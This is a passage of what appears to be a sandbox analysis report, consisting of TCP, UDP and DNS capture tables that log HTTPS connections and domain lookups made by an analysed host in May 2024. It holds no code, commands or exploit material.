                                                                                                                    May 11, 2024 00:05:13.459986925 CEST49768443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:13.459992886 CEST4434976895.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:13.904305935 CEST4434976895.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:13.904381037 CEST4434976895.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:13.904428959 CEST49768443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:13.904449940 CEST49768443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:13.904551029 CEST49768443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:13.904568911 CEST4434976895.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:13.904581070 CEST49768443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:13.904614925 CEST49768443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:13.956968069 CEST49769443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:13.957020998 CEST443497693.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:13.957089901 CEST49769443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:13.957277060 CEST49769443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:13.957298994 CEST443497693.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:14.308116913 CEST443497693.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:14.308181047 CEST49769443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:14.308640003 CEST49769443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:14.308650017 CEST443497693.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:14.309753895 CEST49769443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:14.309762001 CEST443497693.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:14.828250885 CEST443497693.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:14.828322887 CEST443497693.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:14.828365088 CEST49769443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:14.828389883 CEST49769443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:14.829873085 CEST49769443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:14.829890013 CEST443497693.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:14.829901934 CEST49769443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:14.829936028 CEST49769443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:14.867353916 CEST49770443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:14.867377043 CEST44349770138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:14.867460966 CEST49770443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:14.867676973 CEST49770443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:14.867687941 CEST44349770138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:15.047733068 CEST44349770138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:15.047821045 CEST49770443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:15.048234940 CEST49770443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:15.048243999 CEST44349770138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:15.049484015 CEST49770443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:15.049494982 CEST44349770138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:15.726402998 CEST44349770138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:15.726459980 CEST49770443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:15.726509094 CEST44349770138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:15.726552010 CEST49770443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:15.726566076 CEST44349770138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:15.726608992 CEST49770443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:15.726629972 CEST49770443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:15.726650000 CEST44349770138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:15.726660967 CEST49770443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:15.726784945 CEST49770443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:20.773017883 CEST49771443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:20.773068905 CEST443497713.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:20.773142099 CEST49771443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:20.773407936 CEST49771443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:20.773426056 CEST443497713.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:21.129941940 CEST443497713.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:21.130058050 CEST49771443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:21.130548000 CEST49771443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:21.130557060 CEST443497713.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:21.131829977 CEST49771443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:21.131845951 CEST443497713.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:21.474138975 CEST443497713.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:21.474200010 CEST443497713.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:21.474215984 CEST49771443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:21.474250078 CEST49771443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:21.474632025 CEST49771443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:21.474657059 CEST443497713.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:27.092787981 CEST49772443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:27.092823982 CEST44349772138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:27.092883110 CEST49772443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:27.094007969 CEST49772443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:27.094022036 CEST44349772138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:27.277106047 CEST44349772138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:27.277158022 CEST49772443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:27.277740955 CEST49772443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:27.277748108 CEST44349772138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:27.279454947 CEST49772443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:27.279459953 CEST44349772138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:27.819932938 CEST44349772138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:27.820014000 CEST44349772138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:27.820014000 CEST49772443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:27.820092916 CEST49772443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:27.820152044 CEST49772443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:27.820152044 CEST49772443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:27.820168972 CEST44349772138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:27.820338011 CEST49772443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:32.883784056 CEST49773443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:32.883821964 CEST44349773138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:32.883877993 CEST49773443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:32.884134054 CEST49773443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:32.884145021 CEST44349773138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:33.064727068 CEST44349773138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:33.064790010 CEST49773443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:33.065248966 CEST49773443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:33.065258026 CEST44349773138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:33.067011118 CEST49773443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:33.067015886 CEST44349773138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:33.599915028 CEST44349773138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:33.599977016 CEST49773443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:33.600002050 CEST44349773138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:33.600013971 CEST44349773138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:33.600045919 CEST49773443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:33.600059986 CEST49773443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:33.600157022 CEST49773443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:33.600169897 CEST44349773138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:33.600187063 CEST49773443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:33.600210905 CEST49773443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:34.655008078 CEST49774443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:34.655052900 CEST44349774138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:34.656636953 CEST49774443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:34.656830072 CEST49774443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:34.656836033 CEST44349774138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:34.837395906 CEST44349774138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:34.837450027 CEST49774443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:34.837874889 CEST49774443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:34.837879896 CEST44349774138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:34.839570045 CEST49774443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:34.839575052 CEST44349774138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:35.373827934 CEST44349774138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:35.373893976 CEST49774443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:35.373975992 CEST44349774138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:35.373991966 CEST49774443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:35.374016047 CEST49774443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:35.374053955 CEST44349774138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:35.374083042 CEST49774443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:35.374098063 CEST49774443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:39.430622101 CEST49775443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:39.430635929 CEST44349775138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:39.430697918 CEST49775443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:39.430980921 CEST49775443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:39.430995941 CEST44349775138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:39.610713959 CEST44349775138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:39.610770941 CEST49775443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:39.611217976 CEST49775443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:39.611227036 CEST44349775138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:39.612639904 CEST49775443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:39.612644911 CEST44349775138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:40.281117916 CEST44349775138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:40.281543016 CEST44349775138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:40.281569004 CEST49775443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:40.281631947 CEST49775443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:40.281641006 CEST44349775138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:40.281670094 CEST49775443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:40.281723976 CEST49775443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:40.283200026 CEST49775443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:41.462110043 CEST49776443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:41.462141037 CEST4434977695.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:41.462196112 CEST49776443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:41.462481976 CEST49776443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:41.462497950 CEST4434977695.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:41.807674885 CEST4434977695.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:41.807809114 CEST49776443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:41.809799910 CEST49776443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:41.809799910 CEST49776443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:41.809809923 CEST4434977695.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:41.809824944 CEST4434977695.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:42.254204988 CEST4434977695.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:42.254293919 CEST4434977695.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:42.254314899 CEST49776443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:42.254456997 CEST49776443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:42.254456997 CEST49776443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:42.254525900 CEST49776443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:44.207504034 CEST49777443192.168.2.4104.21.16.155
                                                                                                                    May 11, 2024 00:05:44.207562923 CEST44349777104.21.16.155192.168.2.4
                                                                                                                    May 11, 2024 00:05:44.207617044 CEST49777443192.168.2.4104.21.16.155
                                                                                                                    May 11, 2024 00:05:44.208290100 CEST49777443192.168.2.4104.21.16.155
                                                                                                                    May 11, 2024 00:05:44.208307028 CEST44349777104.21.16.155192.168.2.4
                                                                                                                    May 11, 2024 00:05:44.397622108 CEST44349777104.21.16.155192.168.2.4
                                                                                                                    May 11, 2024 00:05:44.397715092 CEST49777443192.168.2.4104.21.16.155
                                                                                                                    May 11, 2024 00:05:45.038084030 CEST49777443192.168.2.4104.21.16.155
                                                                                                                    May 11, 2024 00:05:45.038114071 CEST44349777104.21.16.155192.168.2.4
                                                                                                                    May 11, 2024 00:05:45.038441896 CEST44349777104.21.16.155192.168.2.4
                                                                                                                    May 11, 2024 00:05:45.038494110 CEST49777443192.168.2.4104.21.16.155
                                                                                                                    May 11, 2024 00:05:45.039020061 CEST49777443192.168.2.4104.21.16.155
                                                                                                                    May 11, 2024 00:05:45.080121040 CEST44349777104.21.16.155192.168.2.4
                                                                                                                    May 11, 2024 00:05:45.319808960 CEST49778443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:45.319866896 CEST4434977895.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:45.319930077 CEST49778443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:45.320194960 CEST49778443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:45.320205927 CEST4434977895.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:45.677402973 CEST4434977895.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:45.677457094 CEST49778443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:45.677956104 CEST49778443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:45.677962065 CEST4434977895.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:45.679744959 CEST49778443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:45.679749012 CEST4434977895.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:46.170100927 CEST4434977895.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:46.170213938 CEST49778443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:46.170274973 CEST4434977895.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:46.170330048 CEST4434977895.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:46.170337915 CEST49778443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:46.170337915 CEST49778443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:46.170348883 CEST4434977895.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:46.170367956 CEST49778443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:46.170392990 CEST49778443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:46.170392990 CEST49778443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:48.314795017 CEST49779443192.168.2.454.175.181.104
                                                                                                                    May 11, 2024 00:05:48.314835072 CEST4434977954.175.181.104192.168.2.4
                                                                                                                    May 11, 2024 00:05:48.316441059 CEST49779443192.168.2.454.175.181.104
                                                                                                                    May 11, 2024 00:05:48.320326090 CEST49779443192.168.2.454.175.181.104
                                                                                                                    May 11, 2024 00:05:48.320338964 CEST4434977954.175.181.104192.168.2.4
                                                                                                                    May 11, 2024 00:05:48.520405054 CEST4434977954.175.181.104192.168.2.4
                                                                                                                    May 11, 2024 00:05:48.520679951 CEST49779443192.168.2.454.175.181.104
                                                                                                                    May 11, 2024 00:05:48.521970987 CEST49779443192.168.2.454.175.181.104
                                                                                                                    May 11, 2024 00:05:48.521976948 CEST4434977954.175.181.104192.168.2.4
                                                                                                                    May 11, 2024 00:05:48.522186995 CEST49779443192.168.2.454.175.181.104
                                                                                                                    May 11, 2024 00:05:48.522228956 CEST4434977954.175.181.104192.168.2.4
                                                                                                                    May 11, 2024 00:05:48.522351027 CEST49779443192.168.2.454.175.181.104
                                                                                                                    May 11, 2024 00:05:51.678014994 CEST49780443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:51.678044081 CEST443497803.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:51.678114891 CEST49780443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:51.678450108 CEST49780443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:51.678463936 CEST443497803.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:52.026103020 CEST443497803.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:52.026256084 CEST49780443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:52.026602983 CEST49780443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:52.026611090 CEST443497803.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:52.028354883 CEST49780443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:52.028387070 CEST443497803.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:52.028487921 CEST443497803.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:52.028595924 CEST49780443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:52.028595924 CEST49780443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:53.082654953 CEST44349777104.21.16.155192.168.2.4
                                                                                                                    May 11, 2024 00:05:53.082722902 CEST49777443192.168.2.4104.21.16.155
                                                                                                                    May 11, 2024 00:05:53.082741022 CEST44349777104.21.16.155192.168.2.4
                                                                                                                    May 11, 2024 00:05:53.082782984 CEST49777443192.168.2.4104.21.16.155
                                                                                                                    May 11, 2024 00:05:53.082789898 CEST44349777104.21.16.155192.168.2.4
                                                                                                                    May 11, 2024 00:05:53.082799911 CEST44349777104.21.16.155192.168.2.4
                                                                                                                    May 11, 2024 00:05:53.082834959 CEST49777443192.168.2.4104.21.16.155
                                                                                                                    May 11, 2024 00:05:53.083092928 CEST49777443192.168.2.4104.21.16.155
                                                                                                                    May 11, 2024 00:05:53.083106995 CEST44349777104.21.16.155192.168.2.4
                                                                                                                    May 11, 2024 00:05:53.187452078 CEST49781443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:53.187489033 CEST44349781138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:53.187544107 CEST49781443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:53.187910080 CEST49781443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:53.187923908 CEST44349781138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:53.371217012 CEST44349781138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:53.371274948 CEST49781443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:53.371756077 CEST49781443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:53.371762037 CEST44349781138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:53.373580933 CEST49781443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:53.373620987 CEST44349781138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:53.373672962 CEST49781443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:54.587270975 CEST49782443192.168.2.4104.21.16.155
                                                                                                                    May 11, 2024 00:05:54.587306976 CEST44349782104.21.16.155192.168.2.4
                                                                                                                    May 11, 2024 00:05:54.590352058 CEST49782443192.168.2.4104.21.16.155
                                                                                                                    May 11, 2024 00:05:54.590647936 CEST49782443192.168.2.4104.21.16.155
                                                                                                                    May 11, 2024 00:05:54.590662003 CEST44349782104.21.16.155192.168.2.4
                                                                                                                    May 11, 2024 00:05:54.773096085 CEST44349782104.21.16.155192.168.2.4
                                                                                                                    May 11, 2024 00:05:54.773156881 CEST49782443192.168.2.4104.21.16.155
                                                                                                                    May 11, 2024 00:05:54.773655891 CEST49782443192.168.2.4104.21.16.155
                                                                                                                    May 11, 2024 00:05:54.773664951 CEST44349782104.21.16.155192.168.2.4
                                                                                                                    May 11, 2024 00:05:54.775115967 CEST49782443192.168.2.4104.21.16.155
                                                                                                                    May 11, 2024 00:05:54.775120974 CEST44349782104.21.16.155192.168.2.4
                                                                                                                    May 11, 2024 00:05:57.462661982 CEST49783443192.168.2.491.194.11.183
                                                                                                                    May 11, 2024 00:05:57.462696075 CEST4434978391.194.11.183192.168.2.4
                                                                                                                    May 11, 2024 00:05:57.462765932 CEST49783443192.168.2.491.194.11.183
                                                                                                                    May 11, 2024 00:05:57.463027954 CEST49783443192.168.2.491.194.11.183
                                                                                                                    May 11, 2024 00:05:57.463037968 CEST4434978391.194.11.183192.168.2.4
                                                                                                                    May 11, 2024 00:05:57.675482988 CEST4434978391.194.11.183192.168.2.4
                                                                                                                    May 11, 2024 00:05:57.675545931 CEST49783443192.168.2.491.194.11.183
                                                                                                                    May 11, 2024 00:05:57.676095963 CEST49783443192.168.2.491.194.11.183
                                                                                                                    May 11, 2024 00:05:57.676110029 CEST4434978391.194.11.183192.168.2.4
                                                                                                                    May 11, 2024 00:05:57.677645922 CEST49783443192.168.2.491.194.11.183
                                                                                                                    May 11, 2024 00:05:57.677691936 CEST4434978391.194.11.183192.168.2.4
                                                                                                                    May 11, 2024 00:05:57.677740097 CEST49783443192.168.2.491.194.11.183
                                                                                                                    May 11, 2024 00:06:01.100152969 CEST49784443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:06:01.100197077 CEST443497843.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:06:01.100255013 CEST49784443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:06:01.100661993 CEST49784443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:06:01.100677013 CEST443497843.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:06:01.455171108 CEST443497843.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:06:01.455318928 CEST49784443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:06:02.959152937 CEST49784443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:06:02.959256887 CEST443497843.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:06:02.959311962 CEST49784443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:06:11.854818106 CEST44349782104.21.16.155192.168.2.4
                                                                                                                    May 11, 2024 00:06:11.854876041 CEST49782443192.168.2.4104.21.16.155
                                                                                                                    May 11, 2024 00:06:11.854886055 CEST44349782104.21.16.155192.168.2.4
                                                                                                                    May 11, 2024 00:06:11.854926109 CEST49782443192.168.2.4104.21.16.155
                                                                                                                    May 11, 2024 00:06:11.854979038 CEST44349782104.21.16.155192.168.2.4
                                                                                                                    May 11, 2024 00:06:11.855031967 CEST49782443192.168.2.4104.21.16.155
                                                                                                                    May 11, 2024 00:06:11.855292082 CEST49782443192.168.2.4104.21.16.155
                                                                                                                    May 11, 2024 00:06:11.855308056 CEST44349782104.21.16.155192.168.2.4

                                                                                                                    UDP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    May 11, 2024 00:04:12.655221939 CEST6103653192.168.2.41.1.1.1
                                                                                                                    May 11, 2024 00:04:12.871501923 CEST53610361.1.1.1192.168.2.4
                                                                                                                    May 11, 2024 00:04:13.858141899 CEST4981053192.168.2.41.1.1.1
                                                                                                                    May 11, 2024 00:04:14.159241915 CEST53498101.1.1.1192.168.2.4
                                                                                                                    May 11, 2024 00:04:18.686336040 CEST5941853192.168.2.41.1.1.1
                                                                                                                    May 11, 2024 00:04:18.799472094 CEST53594181.1.1.1192.168.2.4
                                                                                                                    May 11, 2024 00:04:19.608544111 CEST5506253192.168.2.41.1.1.1
                                                                                                                    May 11, 2024 00:04:19.711488962 CEST53550621.1.1.1192.168.2.4
                                                                                                                    May 11, 2024 00:04:35.505889893 CEST5248453192.168.2.41.1.1.1
                                                                                                                    May 11, 2024 00:04:35.619683981 CEST53524841.1.1.1192.168.2.4
                                                                                                                    May 11, 2024 00:05:43.047148943 CEST6322753192.168.2.41.1.1.1
                                                                                                                    May 11, 2024 00:05:43.138046026 CEST53632271.1.1.1192.168.2.4
                                                                                                                    May 11, 2024 00:06:00.977772951 CEST5786553192.168.2.41.1.1.1
                                                                                                                    May 11, 2024 00:06:01.079061031 CEST53578651.1.1.1192.168.2.4
                                                                                                                    May 11, 2024 00:06:08.749888897 CEST5367753192.168.2.41.1.1.1
                                                                                                                    May 11, 2024 00:06:08.864455938 CEST53536771.1.1.1192.168.2.4

                                                                                                                    DNS Queries

                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    May 11, 2024 00:04:12.655221939 CEST192.168.2.41.1.1.10x8441Standard query (0)boriz400.comA (IP address)IN (0x0001)false
                                                                                                                    May 11, 2024 00:04:13.858141899 CEST192.168.2.41.1.1.10x3148Standard query (0)altynbe.comA (IP address)IN (0x0001)false
                                                                                                                    May 11, 2024 00:04:18.686336040 CEST192.168.2.41.1.1.10xaee4Standard query (0)ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.ioA (IP address)IN (0x0001)false
                                                                                                                    May 11, 2024 00:04:19.608544111 CEST192.168.2.41.1.1.10x69b6Standard query (0)anikvan.comA (IP address)IN (0x0001)false
                                                                                                                    May 11, 2024 00:04:35.505889893 CEST192.168.2.41.1.1.10x5f9fStandard query (0)uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioA (IP address)IN (0x0001)false
                                                                                                                    May 11, 2024 00:05:43.047148943 CEST192.168.2.41.1.1.10xc6d8Standard query (0)workspacin.cloudA (IP address)IN (0x0001)false
                                                                                                                    May 11, 2024 00:06:00.977772951 CEST192.168.2.41.1.1.10xc19bStandard query (0)uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioA (IP address)IN (0x0001)false
                                                                                                                    May 11, 2024 00:06:08.749888897 CEST192.168.2.41.1.1.10x7f64Standard query (0)ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.ioA (IP address)IN (0x0001)false

                                                                                                                    DNS Answers

                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    May 11, 2024 00:04:12.871501923 CEST1.1.1.1192.168.2.40x8441No error (0)boriz400.com91.194.11.183A (IP address)IN (0x0001)false
